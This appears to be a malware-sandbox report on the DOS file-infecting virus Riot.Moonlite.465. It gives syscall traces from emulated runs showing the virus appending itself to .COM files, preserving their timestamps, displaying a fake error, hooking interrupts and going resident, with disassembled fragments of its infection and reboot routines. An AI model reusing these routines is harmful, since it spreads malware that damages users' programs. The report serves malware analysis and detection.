Sample viewer

vx.netlux.org/Virus.DOS.Riot.Moonlite.465

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:03:00.79945182Z 26 PC: 12a83 | Set disk transfer address
2018-12-17T22:03:00.801688213Z 78 PC: 12a8e | Find first file
2018-12-17T22:03:00.808245129Z 67 PC: 12aaf | Get or set file attributes
2018-12-17T22:03:00.825218349Z 61 PC: 12ab8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:03:00.833121342Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:00.840298801Z 66 PC: 12acc | Move file pointer
2018-12-17T22:03:00.84220585Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-17T22:03:00.844943915Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:03:00.854107836Z 66 PC: 12aea | Move file pointer
2018-12-17T22:03:00.855508153Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:03:00.862405238Z 87 PC: 12b08 | Get or set file date and time
2018-12-17T22:03:00.864802251Z 62 PC: 12b0c | Close file
2018-12-17T22:03:00.882036826Z 67 PC: 12b1b | Get or set file attributes
2018-12-17T22:03:00.893546695Z 79 PC: 12a8e | Find next file
2018-12-17T22:03:00.897535089Z 67 PC: 12aaf | Get or set file attributes
2018-12-17T22:03:00.907558948Z 61 PC: 12ab8 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:03:00.914497297Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:00.921711133Z 66 PC: 12acc | Move file pointer
2018-12-17T22:03:00.923546347Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-17T22:03:00.926039794Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:03:00.929871011Z 66 PC: 12aea | Move file pointer
2018-12-17T22:03:00.931370213Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:03:00.933776554Z 87 PC: 12b08 | Get or set file date and time
2018-12-17T22:03:00.935064402Z 62 PC: 12b0c | Close file
2018-12-17T22:03:00.94303304Z 67 PC: 12b1b | Get or set file attributes
2018-12-17T22:03:00.958132781Z 79 PC: 12a8e | Find next file
2018-12-17T22:03:00.960806369Z 67 PC: 12aaf | Get or set file attributes
2018-12-17T22:03:00.970673498Z 61 PC: 12ab8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:03:00.977598835Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:00.985070785Z 66 PC: 12acc | Move file pointer
2018-12-17T22:03:01.005062219Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-17T22:03:01.008023989Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:03:01.016274107Z 66 PC: 12aea | Move file pointer
2018-12-17T22:03:01.018745877Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:03:01.026238048Z 87 PC: 12b08 | Get or set file date and time
2018-12-17T22:03:01.028779994Z 62 PC: 12b0c | Close file
2018-12-17T22:03:01.037856978Z 67 PC: 12b1b | Get or set file attributes
2018-12-17T22:03:01.047786327Z 79 PC: 12a8e | Find next file
2018-12-17T22:03:01.050721403Z 67 PC: 12aaf | Get or set file attributes
2018-12-17T22:03:01.061457052Z 61 PC: 12ab8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:03:01.06813633Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:01.074708301Z 66 PC: 12acc | Move file pointer
2018-12-17T22:03:01.077194718Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-17T22:03:01.079461695Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:03:01.08225401Z 66 PC: 12aea | Move file pointer
2018-12-17T22:03:01.083783791Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:03:01.086851513Z 87 PC: 12b08 | Get or set file date and time
2018-12-17T22:03:01.088258146Z 62 PC: 12b0c | Close file
2018-12-17T22:03:01.096148063Z 67 PC: 12b1b | Get or set file attributes
2018-12-17T22:03:01.106749314Z 79 PC: 12a8e | Find next file
2018-12-17T22:03:01.109362822Z 67 PC: 12aaf | Get or set file attributes
2018-12-17T22:03:01.119545423Z 61 PC: 12ab8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:03:01.124424537Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:01.128453572Z 66 PC: 12acc | Move file pointer
2018-12-17T22:03:01.129980165Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-17T22:03:01.133371742Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:03:01.136271069Z 66 PC: 12aea | Move file pointer
2018-12-17T22:03:01.137704068Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:03:01.161736092Z 87 PC: 12b08 | Get or set file date and time
2018-12-17T22:03:01.163353867Z 62 PC: 12b0c | Close file
2018-12-17T22:03:01.16801541Z 67 PC: 12b1b | Get or set file attributes
2018-12-17T22:03:01.174914677Z 79 PC: 12a8e | Find next file
2018-12-17T22:03:01.176677139Z 67 PC: 12aaf | Get or set file attributes
2018-12-17T22:03:01.183329522Z 61 PC: 12ab8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:03:01.187982605Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:01.192074945Z 66 PC: 12acc | Move file pointer
2018-12-17T22:03:01.193149074Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-17T22:03:01.195317726Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:03:01.200476237Z 66 PC: 12aea | Move file pointer
2018-12-17T22:03:01.201433427Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:03:01.206052925Z 87 PC: 12b08 | Get or set file date and time
2018-12-17T22:03:01.207196364Z 62 PC: 12b0c | Close file
2018-12-17T22:03:01.212167918Z 67 PC: 12b1b | Get or set file attributes
2018-12-17T22:03:01.220516862Z 79 PC: 12a8e | Find next file
2018-12-17T22:03:01.222351332Z 67 PC: 12aaf | Get or set file attributes
2018-12-17T22:03:01.230631161Z 61 PC: 12ab8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:03:01.235279669Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:01.239324681Z 66 PC: 12acc | Move file pointer
2018-12-17T22:03:01.240279255Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-17T22:03:01.242342511Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:03:01.244238674Z 66 PC: 12aea | Move file pointer
2018-12-17T22:03:01.245182935Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:03:01.247698756Z 87 PC: 12b08 | Get or set file date and time
2018-12-17T22:03:01.248773843Z 62 PC: 12b0c | Close file
2018-12-17T22:03:01.253478347Z 67 PC: 12b1b | Get or set file attributes
2018-12-17T22:03:01.260418754Z 79 PC: 12a8e | Find next file
2018-12-17T22:03:01.262462339Z 67 PC: 12aaf | Get or set file attributes
2018-12-17T22:03:01.270074299Z 61 PC: 12ab8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:03:01.277648352Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:01.281898592Z 66 PC: 12acc | Move file pointer
2018-12-17T22:03:01.282796859Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-17T22:03:01.284746618Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:03:01.290036526Z 66 PC: 12aea | Move file pointer
2018-12-17T22:03:01.291176778Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:03:01.29612088Z 87 PC: 12b08 | Get or set file date and time
2018-12-17T22:03:01.297666869Z 62 PC: 12b0c | Close file
2018-12-17T22:03:01.30333355Z 67 PC: 12b1b | Get or set file attributes
2018-12-17T22:03:01.312488101Z 79 PC: 12a8e | Find next file
2018-12-17T22:03:01.314215684Z 42 PC: 12b21 | Get date 0x12b21: cmp dl, 1
0x12b24: je 0x12b29
0x12b26: jmp 0x12b93
0x12b28: nop
0x12b29: mov ah, 9
0x12b2b: lea dx, word ptr [bp + 0x2b0]
0x12b2f: int 0x21
0x12b31: jmp 0x12b60
0x12b33: nop
0x12b34: push ax
0x12b35: in al, 0x60
0x12b37: cmp al, 0x53
0x12b39: nop
0x12b3a: nop
0x12b3b: je 0x12b43
0x12b3d: pop ax
0x12b3e: ljmp ptr cs:[0x2d4]
0x12b43: ljmp 0xffff:0
0x12b48: iret
0x12b49: cmp ax, 0x4b00
2018-12-17T22:03:01.315780312Z 26 PC: 12b9d | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1452,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:44.309720311Z 26 PC: 12a83 | Set disk transfer address
2018-12-25T11:43:44.311230558Z 78 PC: 12a8e | Find first file
2018-12-25T11:43:44.316948041Z 67 PC: 12aaf | Get or set file attributes
2018-12-25T11:43:44.332783132Z 61 PC: 12ab8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:44.34027901Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:44.346620622Z 66 PC: 12acc | Move file pointer
2018-12-25T11:43:44.34799503Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-25T11:43:44.350266042Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-25T11:43:44.358915617Z 66 PC: 12aea | Move file pointer
2018-12-25T11:43:44.360667449Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:43:44.367083798Z 87 PC: 12b08 | Get or set file date and time
2018-12-25T11:43:44.369766829Z 62 PC: 12b0c | Close file
2018-12-25T11:43:44.375047156Z 67 PC: 12b1b | Get or set file attributes
2018-12-25T11:43:44.381768889Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.387460539Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.39673155Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.40072474Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.405795594Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.406968211Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.409326076Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.413419138Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.414687282Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.417153912Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.418988061Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.426058597Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.435488127Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.438440652Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.447553452Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.452480526Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.457434771Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.458477457Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.459979211Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.466063496Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.46718814Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.475250541Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.477310965Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.486923115Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.496666239Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.499464479Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.509157492Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.515501998Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.522060608Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.523452093Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.525602359Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.528385969Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.529834425Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.532255068Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.533642408Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.541587681Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.551306006Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.553765286Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.564410712Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.571158551Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.577417776Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.579560318Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.582475231Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.585434669Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.587519796Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.590026444Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.591460886Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.598987637Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.608753391Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.610719181Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.617867996Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.622197054Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.626402201Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.627618181Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.629636856Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.635174191Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.636488243Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.641405345Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.642543027Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.648562163Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.659094796Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.661885817Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.674268064Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.680261545Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.684722209Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.685722004Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.688241442Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.690309384Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.691394743Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.693760676Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.694821647Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.700284263Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.707092664Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.708918829Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.715104529Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.725188145Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.743249175Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.744733185Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.748212247Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.756263359Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.757584568Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.764549335Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.765962063Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.7741494Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.7833732Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.785852474Z 42 PC: 12b21 | Get date 0x12b21: cmp dl, 1
0x12b24: je 0x12b29
0x12b26: jmp 0x12b93
0x12b28: nop
0x12b29: mov ah, 9
0x12b2b: lea dx, word ptr [bp + 0x2b0]
0x12b2f: int 0x21
0x12b31: jmp 0x12b60
0x12b33: nop
0x12b34: push ax
0x12b35: in al, 0x60
0x12b37: cmp al, 0x53
0x12b39: nop
0x12b3a: nop
0x12b3b: je 0x12b43
0x12b3d: pop ax
0x12b3e: ljmp ptr cs:[0x2d4]
0x12b43: ljmp 0xffff:0
0x12b48: iret
0x12b49: cmp ax, 0x4b00
2018-12-25T11:43:44.788115791Z 9 PC: 12b31 | Display string (String= 'Bad command or filename')
2018-12-25T11:43:44.791506471Z 53 PC: 12b65 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:43:44.792905241Z 37 PC: 12b77 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:43:44.79424807Z 53 PC: 12b7c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:43:44.795796243Z 37 PC: 12b8e | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:43:44.796828176Z 49 PC: 12b93 | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1452,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:44.579940552Z 26 PC: 12a83 | Set disk transfer address
2018-12-25T11:43:44.581300631Z 78 PC: 12a8e | Find first file
2018-12-25T11:43:44.585076052Z 67 PC: 12aaf | Get or set file attributes
2018-12-25T11:43:44.597997645Z 61 PC: 12ab8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:44.609433314Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:44.615602386Z 66 PC: 12acc | Move file pointer
2018-12-25T11:43:44.616811782Z 44 PC: 12adb | Get time 0x12adb: mov word ptr [bp + 0x11e], dx
0x12adf: call 0x22a4c
0x12ae2: cdq
0x12ae3: sub cx, cx
0x12ae5: mov ax, 0x4200
0x12ae8: int 0x21
0x12aea: lea dx, word ptr [bp + 0x2d1]
0x12aee: mov cx, 3
0x12af1: mov ah, 0x40
0x12af3: int 0x21
0x12af5: mov dx, word ptr [bp + 0x2f4]
0x12af9: mov cx, word ptr [bp + 0x2f2]
0x12afd: and cl, 0xe0
0x12b00: or cl, 0x15
0x12b03: mov ax, 0x5701
0x12b06: int 0x21
0x12b08: mov ah, 0x3e
0x12b0a: int 0x21
0x12b0c: lea dx, word ptr [bp + 0x2fa]
0x12b10: sub cx, cx
2018-12-25T11:43:44.619511555Z 64 PC: 12a5a | Write file or device (Write 465 bytes on handle 5)
2018-12-25T11:43:44.627596742Z 66 PC: 12aea | Move file pointer
2018-12-25T11:43:44.628741546Z 64 PC: 12af5 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:43:44.635438441Z 87 PC: 12b08 | Get or set file date and time
2018-12-25T11:43:44.637196244Z 62 PC: 12b0c | Close file
2018-12-25T11:43:44.644642948Z 67 PC: 12b1b | Get or set file attributes
2018-12-25T11:43:44.655650987Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.658369772Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.6678448Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.67504406Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.681662573Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.683463411Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.686064897Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.688878689Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.69017801Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.693530856Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.695472041Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.702638697Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.712362567Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.724396081Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.734126658Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.740487607Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.747009899Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.748308958Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.750461591Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.758886135Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.7600899Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.766167141Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.768234458Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.775511927Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.784649047Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.787525732Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.796994881Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.803327686Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.811137352Z 66 PC: 12acc | Move file pointer (See above)
2018-12-25T11:43:44.812562978Z 44 PC: 12adb | Get time (See above)
2018-12-25T11:43:44.815513745Z 64 PC: 12a5a | Write file or device (See above)
2018-12-25T11:43:44.81989034Z 66 PC: 12aea | Move file pointer (See above)
2018-12-25T11:43:44.832930898Z 64 PC: 12af5 | Write file or device (See above)
2018-12-25T11:43:44.835670199Z 87 PC: 12b08 | Get or set file date and time (See above)
2018-12-25T11:43:44.837609668Z 62 PC: 12b0c | Close file (See above)
2018-12-25T11:43:44.845501712Z 67 PC: 12b1b | Get or set file attributes (See above)
2018-12-25T11:43:44.855883987Z 79 PC: 12a8e | Find next file (See above)
2018-12-25T11:43:44.86167028Z 67 PC: 12aaf | Get or set file attributes (See above)
2018-12-25T11:43:44.880784266Z 61 PC: 12ab8 | Open file (See above)
2018-12-25T11:43:44.887477661Z 63 PC: 12ac4 | Read file or device (See above)
2018-12-25T11:43:44.893839788Z 66 PC: 12acc | Move file pointer (See above)
